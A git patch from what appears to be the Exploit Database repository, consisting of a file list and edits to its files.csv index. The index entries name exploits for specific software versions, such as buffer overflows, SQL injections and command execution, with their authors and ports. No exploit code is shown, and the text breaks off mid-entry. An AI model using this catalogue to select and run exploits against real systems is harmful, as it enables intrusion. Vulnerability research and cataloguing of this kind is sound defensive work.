From 2d7502a652300e8b068278dad5774349bdcfff97 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 23 Mar 2014 04:30:36 +0000 Subject: [PATCH] Updated 03_23_2014 --- files.csv | 157 +++++---- platforms/cgi/webapps/1680.pm | 499 ++++++++++++++-------------- platforms/cgi/webapps/32430.txt | 9 + platforms/hardware/dos/9268.rb | 104 +++--- platforms/jsp/webapps/32423.txt | 9 + platforms/jsp/webapps/32424.txt | 9 + platforms/jsp/webapps/32425.txt | 9 + platforms/php/webapps/32418.txt | 11 + platforms/php/webapps/32419.pl | 101 ++++++ platforms/php/webapps/32421.html | 9 + platforms/php/webapps/32422.txt | 13 + platforms/php/webapps/32427.txt | 9 + platforms/php/webapps/32431.txt | 7 + platforms/php/webapps/32432.txt | 10 + platforms/php/webapps/32433.txt | 10 + platforms/php/webapps/32434.txt | 7 + platforms/php/webapps/32437.txt | 82 +++++ platforms/php/webapps/5762.txt | 38 +-- platforms/php/webapps/8820.txt | 432 ++++++++++++------------ platforms/windows/dos/32420.c | 163 +++++++++ platforms/windows/dos/32428.txt | 126 +++++++ platforms/windows/dos/32435.c | 46 +++ platforms/windows/remote/1626.pm | 238 ++++++------- platforms/windows/remote/32426.c | 214 ++++++++++++ platforms/windows/remote/32429.html | 10 + 25 files changed, 1597 insertions(+), 725 deletions(-) create mode 100755 platforms/cgi/webapps/32430.txt create mode 100755 platforms/jsp/webapps/32423.txt create mode 100755 platforms/jsp/webapps/32424.txt create mode 100755 platforms/jsp/webapps/32425.txt create mode 100755 platforms/php/webapps/32418.txt create mode 100755 platforms/php/webapps/32419.pl create mode 100755 platforms/php/webapps/32421.html create mode 100755 platforms/php/webapps/32422.txt create mode 100755 platforms/php/webapps/32427.txt create mode 100755 platforms/php/webapps/32431.txt create mode 100755 platforms/php/webapps/32432.txt create mode 100755 platforms/php/webapps/32433.txt create mode 100755 platforms/php/webapps/32434.txt create mode 100755 platforms/php/webapps/32437.txt create mode 100755 platforms/windows/dos/32420.c create mode 100755 platforms/windows/dos/32428.txt create mode 100755 platforms/windows/dos/32435.c create mode 100755 platforms/windows/remote/32426.c create mode 100755 platforms/windows/remote/32429.html diff --git a/files.csv b/files.csv index c9d06a0db..c6ec6a203 100755 --- a/files.csv +++ b/files.csv @@ -1364,7 +1364,7 @@ id,file,description,date,author,platform,type,port 1623,platforms/asp/webapps/1623.pl,"EzASPSite <= 2.0 RC3 (Scheme) Remote SQL Injection Exploit",2006-03-29,nukedx,asp,webapps,0 1624,platforms/tru64/local/1624.pl,"Tru64 UNIX 5.0 (Rev. 910) rdist NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0 1625,platforms/tru64/local/1625.pl,"Tru64 UNIX 5.0 (Rev. 910) edauth NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0 -1626,platforms/windows/remote/1626.pm,"PeerCast <= 0.1216 Remote Buffer Overflow Exploit (win32) (meta)",2006-03-30,"H D Moore",windows,remote,7144 +1626,platforms/windows/remote/1626.pm,"PeerCast <= 0.1216 - Remote Buffer Overflow Exploit (win32) (meta)",2006-03-30,"H D Moore",windows,remote,7144 1627,platforms/php/webapps/1627.php,"Claroline <= 1.7.4 (scormExport.inc.php) Remote Code Execution Exploit",2006-03-30,rgod,php,webapps,0 1628,platforms/windows/remote/1628.cpp,"MS Internet Explorer (createTextRang) Download Shellcoded Exploit (2)",2006-03-31,ATmaCA,windows,remote,0 1629,platforms/php/webapps/1629.pl,"SQuery <= 4.5 (libpath) Remote File Inclusion Exploit",2006-04-01,uid0,php,webapps,0 @@ -1408,7 +1408,7 @@ id,file,description,date,author,platform,type,port 1677,platforms/cgi/webapps/1677.php,"SysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit",2006-04-14,rgod,cgi,webapps,0 1678,platforms/php/webapps/1678.php,"PHP Album <= 0.3.2.3 - Remote Command Execution Exploit",2006-04-15,rgod,php,webapps,0 1679,platforms/novell/remote/1679.pm,"Novell Messenger Server 2.0 (Accept-Language) Remote Overflow Exploit",2006-04-15,"H D Moore",novell,remote,8300 -1680,platforms/cgi/webapps/1680.pm,"Symantec Sygate Management Server (login) SQL Injection Exploit",2006-04-15,Nicob,cgi,webapps,0 +1680,platforms/cgi/webapps/1680.pm,"Symantec Sygate Management Server - (login) SQL Injection Exploit",2006-04-15,Nicob,cgi,webapps,0 1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 (WebConsole) Remote Stack Overflow Exploit",2006-04-15,N/A,windows,remote,8080 1682,platforms/php/webapps/1682.php,"Fuju News 1.0 Authentication Bypass / Remote SQL Injection Exploit",2006-04-16,snatcher,php,webapps,0 1683,platforms/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - Remote SQL Injection Exploit",2006-04-16,snatcher,php,webapps,0 @@ -1647,7 +1647,7 @@ id,file,description,date,author,platform,type,port 1937,platforms/multiple/dos/1937.html,"Opera 9 (long href) Remote Denial of Service Exploit",2006-06-21,N9,multiple,dos,0 1938,platforms/php/webapps/1938.pl,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (perl)",2006-06-21,RusH,php,webapps,0 1939,platforms/php/webapps/1939.php,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (php)",2006-06-21,RusH,php,webapps,0 -1940,platforms/windows/remote/1940.pm,"MS Windows RRAS Remote Stack Overflow Exploit (MS06-025)",2006-06-22,"H D Moore",windows,remote,445 +1940,platforms/windows/remote/1940.pm,"MS Windows RRAS - Remote Stack Overflow Exploit (MS06-025)",2006-06-22,"H D Moore",windows,remote,445 1941,platforms/php/webapps/1941.php,"Mambo <= 4.6rc1 (Weblinks) Remote Blind SQL Injection Exploit (2)",2006-06-22,rgod,php,webapps,0 1942,platforms/php/webapps/1942.txt,"ralf image gallery <= 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0 1943,platforms/php/webapps/1943.txt,"Harpia CMS <= 1.0.5 - Remote File Include Vulnerabilities",2006-06-22,Kw3[R]Ln,php,webapps,0 @@ -4997,7 +4997,7 @@ id,file,description,date,author,platform,type,port 5363,platforms/php/webapps/5363.txt,"Affiliate Directory (cat_id) Remote SQL Injection Vulnerbility",2008-04-04,t0pP8uZz,php,webapps,0 5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 (photo_id) SQL Injection Vulnerability",2008-04-04,t0pP8uZz,php,webapps,0 5365,platforms/php/webapps/5365.txt,"Blogator-script 0.95 (incl_page) Remote File Inclusion Vulnerability",2008-04-04,JIKO,php,webapps,0 -5366,platforms/solaris/remote/5366.rb,"Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit (meta)",2008-04-04,I)ruid,solaris,remote,0 +5366,platforms/solaris/remote/5366.rb,"Sun Solaris <= 10 - rpc.ypupdated Remote Root Exploit (meta)",2008-04-04,I)ruid,solaris,remote,0 5367,platforms/php/webapps/5367.pl,"PIGMy-SQL <= 1.4.1 (getdata.php id) Blind SQL Injection Exploit",2008-04-04,t0pP8uZz,php,webapps,0 5368,platforms/php/webapps/5368.txt,"Blogator-script 0.95 (id_art) Remote SQL Injection Vulnerability",2008-04-04,"Virangar Security",php,webapps,0 5369,platforms/php/webapps/5369.txt,"Dragoon 0.1 (lng) Local File Inclusion Vulnerability",2008-04-04,w0cker,php,webapps,0 @@ -5382,7 +5382,7 @@ id,file,description,date,author,platform,type,port 5759,platforms/php/webapps/5759.txt,"Joomla Component rapidrecipe Remote SQL injection Vulnerability",2008-06-08,His0k4,php,webapps,0 5760,platforms/php/webapps/5760.pl,"Galatolo Web Manager <= 1.0 - Remote SQL Injection Exploit",2008-06-09,Stack,php,webapps,0 5761,platforms/php/webapps/5761.pl,"iJoomla News Portal (Itemid) Remote SQL Injection Exploit",2008-06-09,"ilker Kandemir",php,webapps,0 -5762,platforms/php/webapps/5762.txt,"ProManager 0.73 (config.php) Local File Inclusion Vulnerability",2008-06-09,Stack,php,webapps,0 +5762,platforms/php/webapps/5762.txt,"ProManager 0.73 - (config.php) Local File Inclusion Vulnerability",2008-06-09,Stack,php,webapps,0 5763,platforms/asp/webapps/5763.txt,"real estate web site 1.0 (sql/xss) Multiple Vulnerabilities",2008-06-09,JosS,asp,webapps,0 5764,platforms/php/webapps/5764.txt,"telephone directory 2008 (sql/xss) Multiple Vulnerabilities",2008-06-09,"CWH Underground",php,webapps,0 5765,platforms/asp/webapps/5765.txt,"ASPilot Pilot Cart 7.3 (article) Remote SQL Injection Vulnerability",2008-06-09,Bl@ckbe@rD,asp,webapps,0 @@ -8316,7 +8316,7 @@ id,file,description,date,author,platform,type,port 8817,platforms/php/webapps/8817.txt,"Evernew Free Joke Script 1.2 (cat_id) Remote SQL Injection Vulnerability",2009-05-27,taRentReXx,php,webapps,0 8818,platforms/php/webapps/8818.txt,"AdPeeps 8.5d1 XSS and HTML Injection Vulnerabilities",2009-05-27,intern0t,php,webapps,0 8819,platforms/php/webapps/8819.txt,"small pirate v-2.1 (xss/sql) Multiple Vulnerabilities",2009-05-29,YEnH4ckEr,php,webapps,0 -8820,platforms/php/webapps/8820.txt,"amember 3.1.7 (xss/sql/hi) Multiple Vulnerabilities",2009-05-29,intern0t,php,webapps,0 +8820,platforms/php/webapps/8820.txt,"amember 3.1.7 - (xss/sql/hi) Multiple Vulnerabilities",2009-05-29,intern0t,php,webapps,0 8821,platforms/php/webapps/8821.txt,"Joomla Component JVideo 0.3.x SQL Injection Vulnerability",2009-05-29,"Chip d3 bi0s",php,webapps,0 8822,platforms/multiple/dos/8822.txt,"Mozilla Firefox 3.0.10 (KEYGEN) Remote Denial of Service Exploit",2009-05-29,"Thierry Zoller",multiple,dos,0 8823,platforms/php/webapps/8823.txt,"Webboard <= 2.90 beta - Remote File Disclosure Vulnerability",2009-05-29,MrDoug,php,webapps,0 @@ -8740,7 +8740,7 @@ id,file,description,date,author,platform,type,port 9265,platforms/linux/dos/9265.c,"ISC DHCP dhclient < 3.1.2p1 Remote Buffer Overflow PoC",2009-07-27,"Jon Oberheide",linux,dos,0 9266,platforms/php/webapps/9266.txt,"iwiccle 1.01 (lfi/sql) Multiple Vulnerabilities",2009-07-27,SirGod,php,webapps,0 9267,platforms/php/webapps/9267.txt,"VS PANEL 7.5.5 (Cat_ID) SQL Injection Vulnerability (patched?)",2009-07-27,octopos,php,webapps,0 -9268,platforms/hardware/dos/9268.rb,"Cisco WLC 4402 Basic Auth Remote Denial of Service (meta)",2009-07-27,"Christoph Bott",hardware,dos,0 +9268,platforms/hardware/dos/9268.rb,"Cisco WLC 4402 - Basic Auth Remote Denial of Service (meta)",2009-07-27,"Christoph Bott",hardware,dos,0 9269,platforms/php/webapps/9269.txt,"PHP Paid 4 Mail Script (home.php page) Remote File Inclusion Vuln",2009-07-27,int_main();,php,webapps,0 9270,platforms/php/webapps/9270.txt,"Super Mod System 3.0 - (s) SQL Injection Vulnerability",2009-07-27,MizoZ,php,webapps,0 9271,platforms/php/webapps/9271.txt,"Inout Adserver (id) Remote SQL injection Vulnerability",2009-07-27,boom3rang,php,webapps,0 @@ -9268,7 +9268,7 @@ id,file,description,date,author,platform,type,port 9882,platforms/windows/local/9882.txt,"Firefox 3.5.3 - Local Download Manager Temp File Creation",2009-10-28,"Jeremy Brown",windows,local,0 9884,platforms/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 malformed certificate PoC",2009-10-21,Dr_IDE,windows,local,0 9885,platforms/windows/webapps/9885.txt,"httpdx <= 1.4.6b source disclosure",2009-10-21,Dr_IDE,windows,webapps,0 -9886,platforms/windows/remote/9886.txt,"httpdx 1.4 h_handlepeer BoF",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0 +9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer BoF",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0 9887,platforms/jsp/webapps/9887.txt,"jetty 6.x - 7.x xss, information disclosure, injection",2009-10-26,"Antonion Parata",jsp,webapps,0 9888,platforms/php/webapps/9888.txt,"Joomla Ajax Chat 1.0 remote file inclusion",2009-10-19,kaMtiEz,php,webapps,0 9889,platforms/php/webapps/9889.txt,"Joomla Book Library 1.0 file inclusion",2009-10-19,kaMtiEz,php,webapps,0 @@ -9290,50 +9290,50 @@ id,file,description,date,author,platform,type,port 9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 Cache Lite Output Remote File Inclusion",2008-06-14,MC,php,webapps,0 9907,platforms/cgi/webapps/9907.rb,"The Matt Wright guestbook.pl <= 2.3.1 - Server Side Include Vulnerability",1999-11-05,patrick,cgi,webapps,0 9908,platforms/php/webapps/9908.rb,"BASE <= 1.2.4 base_qry_common.php Remote File Inclusion",2008-06-14,MC,php,webapps,0 -9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4-6.5 AllowToUpdateStatsFromBrowser Command Injection",2006-05-04,patrick,cgi,webapps,0 +9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4-6.5 - AllowToUpdateStatsFromBrowser Command Injection",2006-05-04,patrick,cgi,webapps,0 9910,platforms/php/webapps/9910.rb,"Dogfood CRM 2.0.10 spell.php Command Injection",2009-03-03,LSO,php,webapps,0 9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d graph_view.php Command Injection",2005-01-15,"David Maciejak",php,webapps,0 -9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2-6.1 configdir Command Injection",2005-01-15,"Matteo Cantoni",cgi,webapps,0 -9913,platforms/multiple/remote/9913.rb,"ClamAV Milter <= 0.92.2 Blackhole-Mode (sendmail) Code Execution",2007-08-24,patrick,multiple,remote,25 +9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2-6.1 - configdir Command Injection",2005-01-15,"Matteo Cantoni",cgi,webapps,0 +9913,platforms/multiple/remote/9913.rb,"ClamAV Milter <= 0.92.2 - Blackhole-Mode (sendmail) Code Execution",2007-08-24,patrick,multiple,remote,25 9914,platforms/unix/remote/9914.rb,"SpamAssassin spamd <= 3.1.3 - Command Injection",2006-06-06,patrick,unix,remote,783 -9915,platforms/multiple/remote/9915.rb,"DistCC Daemon Command Execution",2002-02-01,"H D Moore",multiple,remote,3632 +9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution",2002-02-01,"H D Moore",multiple,remote,3632 9916,platforms/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 Command Execution",2009-02-25,patrick,multiple,webapps,0 -9917,platforms/solaris/remote/9917.rb,"Solaris in.telnetd TTYPROMPT Buffer Overflow",2002-01-18,MC,solaris,remote,23 -9918,platforms/solaris/remote/9918.rb,"Solaris 10, 11 Telnet Remote Authentication Bypass",2007-02-12,MC,solaris,remote,23 -9920,platforms/solaris/remote/9920.rb,"Solaris sadmind adm_build_path Buffer Overflow",2008-10-14,"Adriano Lima",solaris,remote,111 -9921,platforms/solaris/remote/9921.rb,"Solaris <= 8.0 LPD Command Execution",2001-08-31,"H D Moore",solaris,remote,515 +9917,platforms/solaris/remote/9917.rb,"Solaris in.telnetd TTYPROMPT - Buffer Overflow",2002-01-18,MC,solaris,remote,23 +9918,platforms/solaris/remote/9918.rb,"Solaris 10, 11 Telnet - Remote Authentication Bypass",2007-02-12,MC,solaris,remote,23 +9920,platforms/solaris/remote/9920.rb,"Solaris sadmind adm_build_path - Buffer Overflow",2008-10-14,"Adriano Lima",solaris,remote,111 +9921,platforms/solaris/remote/9921.rb,"Solaris <= 8.0 - LPD Command Execution",2001-08-31,"H D Moore",solaris,remote,515 9922,platforms/php/webapps/9922.txt,"Oscailt CMS 3.3 - Local File Inclusion",2009-10-28,s4r4d0,php,webapps,0 -9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd Heap Overflow",2002-06-10,noir,solaris,remote,6112 -9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 - 2.2.8 trans2open Overflow (OS X)",2003-04-07,"H D Moore",osx,remote,139 +9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd - Heap Overflow",2002-06-10,noir,solaris,remote,6112 +9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 - 2.2.8 - trans2open Overflow (OS X)",2003-04-07,"H D Moore",osx,remote,139 9925,platforms/osx/remote/9925.rb,"Apple Quicktime RTSP 10.4.0 - 10.5.0 Content-Type Overflow (OS X)",2009-10-28,N/A,osx,remote,0 9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 tinybrowser Remote File Upload/Execute Vulnerability",2009-07-22,spinbad,php,webapps,0 9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0, 10.4.8 UPnP Location Overflow (OS X)",2009-10-28,N/A,osx,remote,0 -9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server <= 5.3.2 USER Overflow (OS X)",2004-07-13,ddz,osx,remote,21 -9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 Image Attachment Command Execution (OS X)",2006-03-01,"H D Moore",osx,remote,25 -9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client <= 5.3.3 Type 77 Overflow (OS X)",2005-02-18,"H D Moore",osx,remote,0 -9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 LoginEXT PathName Overflow (OS X)",2004-03-03,"H D Moore",osx,remote,548 -9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 LSASS CIFS.NLM Overflow",2007-01-21,toto,novell,remote,0 +9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server <= 5.3.2 - USER Overflow (OS X)",2004-07-13,ddz,osx,remote,21 +9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 - Image Attachment Command Execution (OS X)",2006-03-01,"H D Moore",osx,remote,25 +9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client <= 5.3.3 - Type 77 Overflow (OS X)",2005-02-18,"H D Moore",osx,remote,0 +9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 - LoginEXT PathName Overflow (OS X)",2004-03-03,"H D Moore",osx,remote,548 +9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow",2007-01-21,toto,novell,remote,0 9933,platforms/php/webapps/9933.txt,"PHP168 6.0 Command Execution",2009-10-28,"Securitylab Security Research",php,webapps,0 -9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver Command Execution",2009-07-10,kf,multiple,remote,0 +9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution",2009-07-10,kf,multiple,remote,0 9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow",2004-05-19,spoonm,multiple,remote,3690 -9936,platforms/linux/remote/9936.rb,"Samba 2.2.x nttrans Overflow",2003-04-07,"H D Moore",linux,remote,139 +9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - nttrans Overflow",2003-04-07,"H D Moore",linux,remote,139 9937,platforms/multiple/remote/9937.rb,"RealServer 7-9 Describe Buffer Overflow",2002-12-20,"H D Moore",multiple,remote,0 -9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 unserialize Overflow",2007-03-01,sesser,php,remote,0 -9940,platforms/linux/remote/9940.rb,"ntpd 4.0.99j-k readvar Buffer Overflow",2001-04-04,patrick,linux,remote,123 -9941,platforms/multiple/remote/9941.rb,"Veritas NetBackup Remote Command Execution",2004-10-21,patrick,multiple,remote,0 -9942,platforms/multiple/remote/9942.rb,"HP OpenView OmniBack II A.03.50 Command Executino",2001-02-28,"H D Moore",multiple,remote,5555 -9943,platforms/multiple/remote/9943.rb,"Apple Quicktime for Java 7 Memory Access",2007-04-23,"H D Moore",multiple,remote,0 -9944,platforms/multiple/remote/9944.rb,"Opera 9.50, 9.61 historysearch Command Execution",2008-10-23,egypt,multiple,remote,0 +9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 - unserialize Overflow",2007-03-01,sesser,php,remote,0 +9940,platforms/linux/remote/9940.rb,"ntpd 4.0.99j-k readvar - Buffer Overflow",2001-04-04,patrick,linux,remote,123 +9941,platforms/multiple/remote/9941.rb,"Veritas NetBackup - Remote Command Execution",2004-10-21,patrick,multiple,remote,0 +9942,platforms/multiple/remote/9942.rb,"HP OpenView OmniBack II A.03.50 - Command Executino",2001-02-28,"H D Moore",multiple,remote,5555 +9943,platforms/multiple/remote/9943.rb,"Apple Quicktime for Java 7 - Memory Access",2007-04-23,"H D Moore",multiple,remote,0 +9944,platforms/multiple/remote/9944.rb,"Opera 9.50, 9.61 historysearch - Command Execution",2008-10-23,egypt,multiple,remote,0 9945,platforms/multiple/remote/9945.rb,"Opera <= 9.10 Configuration Overwrite",2007-03-05,egypt,multiple,remote,0 -9946,platforms/multiple/remote/9946.rb,"Mozilla Suite/Firefox < 1.5.0.5 Navigator Object Code Execution",2006-07-25,"H D Moore",multiple,remote,0 -9947,platforms/windows/remote/9947.rb,"Mozilla Suite/Firefox < 1.0.5 compareTo Code Execution",2005-07-13,"H D Moore",windows,remote,0 +9946,platforms/multiple/remote/9946.rb,"Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution",2006-07-25,"H D Moore",multiple,remote,0 +9947,platforms/windows/remote/9947.rb,"Mozilla Suite/Firefox < 1.0.5 - compareTo Code Execution",2005-07-13,"H D Moore",windows,remote,0 9948,platforms/multiple/remote/9948.rb,"Sun Java Runtime and Development Kit <= 6 Update 10 - Calendar Deserialization Exploit",2008-12-03,sf,multiple,remote,0 -9949,platforms/multiple/remote/9949.rb,"Firefox 3.5 escape Memory Corruption Exploit",2006-07-14,"H D Moore",multiple,remote,0 -9950,platforms/linux/remote/9950.rb,"Samba 3.0.21-3.0.24 LSA trans names Heap Overflow",2007-05-14,"Adriano Lima",linux,remote,0 -9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x, 3.x NTLM Buffer Overflow",2004-06-08,skape,multiple,remote,3129 -9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 and 1.1.3-20030409 Negative Read Overflow",2003-04-09,spoonm,linux,remote,1723 -9953,platforms/linux/remote/9953.rb,"MySQL <= 6.0 yaSSL <= 1.7.5 Hello Message Buffer Overflow",2008-01-04,MC,linux,remote,3306 -9954,platforms/linux/remote/9954.rb,"Borland InterBase 2007 PWD_db_aliased Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 +9949,platforms/multiple/remote/9949.rb,"Firefox 3.5 - escape Memory Corruption Exploit",2006-07-14,"H D Moore",multiple,remote,0 +9950,platforms/linux/remote/9950.rb,"Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow",2007-05-14,"Adriano Lima",linux,remote,0 +9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x, 3.x - NTLM Buffer Overflow",2004-06-08,skape,multiple,remote,3129 +9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 and 1.1.3-20030409 - Negative Read Overflow",2003-04-09,spoonm,linux,remote,1723 +9953,platforms/linux/remote/9953.rb,"MySQL <= 6.0 yaSSL <= 1.7.5 - Hello Message Buffer Overflow",2008-01-04,MC,linux,remote,3306 +9954,platforms/linux/remote/9954.rb,"Borland InterBase 2007 - PWD_db_aliased Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 9955,platforms/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 privilege escalation",2009-10-20,trompele,hardware,local,0 9956,platforms/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 DoS",2009-10-14,"Townsend Harris",hardware,dos,0 9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 PoC BoF",2009-10-23,"Francis Provencher",windows,remote,0 @@ -9383,7 +9383,7 @@ id,file,description,date,author,platform,type,port 10006,platforms/php/webapps/10006.txt,"DreamPoll 3.1 Vulnerabilities",2009-10-08,"Mark from infosecstuff",php,webapps,0 10007,platforms/windows/remote/10007.html,"EasyMail Objects EMSMTP.DLL 6.0.1 ActiveX Control Remote Buffer Overflow Vulnerability",2009-11-12,"Will Dormann",windows,remote,0 10008,platforms/windows/remote/10008.txt,"EMC Captiva QuickScan Pro 4.6 sp1 and EMC Documentum ApllicationXtender Desktop 5.4",2009-09-30,pyrokinesis,windows,remote,0 -10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities",2009-11-11,"Carsten Eiram",windows,local,0 +10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities",2009-11-11,"Carsten Eiram",windows,local,0 10010,platforms/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - (.wav) Local Buffer Overflow",2009-10-09,KriPpLer,windows,local,0 10011,platforms/hardware/remote/10011.txt,"HP LaserJet printers - Multiple Stored XSS Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80 10012,platforms/multiple/webapps/10012.py,"html2ps 'include file' Server Side Include Directive Directory Traversal Vulnerability",2009-09-25,epiphant,multiple,webapps,0 @@ -9393,25 +9393,25 @@ id,file,description,date,author,platform,type,port 10016,platforms/php/webapps/10016.pl,"JForJoomla JReservation Joomla! Component 1.5 - 'pid' Parameter SQL Injection Vulnerability",2009-11-10,"Chip d3 bi0s",php,webapps,0 10017,platforms/linux/dos/10017.c,"Linux Kernel 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"David Howells",linux,dos,0 10018,platforms/linux/local/10018.sh,"Linux Kernel 'pipe.c' - Local Privilege Escalation Vulnerability",2009-11-12,"Earl Chew",linux,local,0 -10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007, 2007 SP2 open_marker_file Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 -10020,platforms/linux/remote/10020.rb,"Borland InterBase 2007, 2007 sp2 jrd8_create_database Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 -10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007, 2007SP2 INET_connect Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 +10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007, 2007 SP2 - open_marker_file Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 +10020,platforms/linux/remote/10020.rb,"Borland InterBase 2007, 2007 sp2 - jrd8_create_database Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 +10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007, 2007 SP2 - INET_connect Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 10022,platforms/linux/local/10022.c,"Linux Kernel 'unix_stream_connect()' Local Denial of Service Vulnerability",2009-11-10,"Tomoki Sekiyama",linux,local,0 -10023,platforms/linux/remote/10023.rb,"Salim Gasmi GLD 1.0 - 1.4 Postfix Greylisting Buffer Overflow",2005-04-12,patrick,linux,remote,2525 -10024,platforms/linux/remote/10024.rb,"Madwifi < 0.9.2.1 SIOCGIWSCAN Buffer Overflow",2006-12-08,"Julien Tinnes",linux,remote,0 -10025,platforms/linux/remote/10025.rb,"University of Washington imap LSUB Buffer Overflow",2000-04-16,patrick,linux,remote,143 -10026,platforms/linux/remote/10026.rb,"Snort 2.4.0 - 2.4.3 Back Orifice Pre-Preprocessor Remote Exploit",2005-10-18,"KaiJern Lau",linux,remote,9080 +10023,platforms/linux/remote/10023.rb,"Salim Gasmi GLD 1.0 - 1.4 - Postfix Greylisting Buffer Overflow",2005-04-12,patrick,linux,remote,2525 +10024,platforms/linux/remote/10024.rb,"Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow",2006-12-08,"Julien Tinnes",linux,remote,0 +10025,platforms/linux/remote/10025.rb,"University of Washington - imap LSUB Buffer Overflow",2000-04-16,patrick,linux,remote,143 +10026,platforms/linux/remote/10026.rb,"Snort 2.4.0 - 2.4.3 - Back Orifice Pre-Preprocessor Remote Exploit",2005-10-18,"KaiJern Lau",linux,remote,9080 10027,platforms/linux/remote/10027.rb,"PeerCast <= 0.1216",2006-03-08,MC,linux,remote,7144 10028,platforms/cgi/remote/10028.rb,"Linksys WRT54G < 4.20.7 , WRT54GS < 1.05.2 apply.cgi Buffer Overflow",2005-09-13,"Raphael Rigo",cgi,remote,80 -10029,platforms/linux/remote/10029.rb,"Berlios GPSD 1.91-1 - 2.7-2 Format String Vulnerability",2005-05-25,"Yann Senotier",linux,remote,2947 +10029,platforms/linux/remote/10029.rb,"Berlios GPSD 1.91-1 - 2.7-2 - Format String Vulnerability",2005-05-25,"Yann Senotier",linux,remote,2947 10030,platforms/linux/remote/10030.rb,"DD-WRT HTTP v24-SP1 - Command Injection Vulnerability",2009-07-20,"H D Moore",linux,remote,80 -10031,platforms/cgi/webapps/10031.rb,"Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 masterCGI Command Injection",2007-09-17,patrick,cgi,webapps,443 -10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 ""Secure"" Overflow",2004-07-18,onetwo,linux,remote,7787 -10033,platforms/irix/remote/10033.rb,"Irix LPD tagprinter Command Execution",2001-09-01,"H D Moore",irix,remote,515 -10034,platforms/hp-ux/remote/10034.rb,"HP-UX LPD 10.20, 11.00, 11.11 Command Execution",2002-08-28,"H D Moore",hp-ux,remote,515 -10035,platforms/bsd/remote/10035.rb,"Xtacacsd <= 4.1.2 report Buffer Overflow",2008-01-08,MC,bsd,remote,49 +10031,platforms/cgi/webapps/10031.rb,"Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 - masterCGI Command Injection",2007-09-17,patrick,cgi,webapps,443 +10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 - ""Secure"" Overflow",2004-07-18,onetwo,linux,remote,7787 +10033,platforms/irix/remote/10033.rb,"Irix LPD tagprinter - Command 